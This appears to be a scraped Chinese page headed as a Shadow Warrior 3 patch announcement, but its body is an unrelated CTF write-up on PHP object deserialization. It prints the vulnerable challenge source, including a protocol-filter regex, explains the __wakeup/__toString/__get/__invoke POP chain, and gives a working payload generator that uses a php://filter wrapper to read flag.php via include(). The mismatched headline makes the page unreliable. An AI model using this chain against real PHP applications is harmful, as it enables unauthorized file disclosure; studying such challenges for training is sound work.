《影子武士3》釋出1.04補丁更新 新增新難度英雄模式
阿新 • • 發佈:2022-05-10
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append($value){ include($value); }public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source."<br>"; } public function __toString(){return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { echo "hacker"; $this->source = "index.php"; } } } class Test{ public $p; public function __construct(){$this->p = array(); } public function __get($key){ $function = $this->p; return $function(); } } if(isset($_GET['pop'])){ @unserialize($_GET['pop']); } else{ $a=new Show; highlight_file(__FILE__); }
這題用到的魔術方法
__construct 當一個物件建立時被呼叫, __toString 當一個物件被當作一個字串被呼叫。 __wakeup() 使用unserialize時觸發 __get() 用於從不可訪問的屬性讀取資料 #難以訪問包括:(1)私有屬性,(2)沒有初始化的屬性 __invoke() 當指令碼嘗試將物件呼叫為函式時觸發
構造一下pop鏈
首先反序列化函式,觸發Show類中的wakeup方法,wakeup方法做字串處理,觸發tosring方法,如果將str例項化為Test,因為Test類中不含source屬性,所以呼叫get方法,將function例項化為Modifier類,即可觸發其中invoke方法,最終呼叫檔案包含函式,讀取flag.php
payload
<?php class Modifier { protected $var = 'php://filter/convert.base64-encode/resource=flag.php'; } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; } } class Test{ public $p; } $b = new Show(); $b->str = new Test(); $b->str->p = new Modifier; $a = new Show($b); echo urlencode(serialize($a)); ?>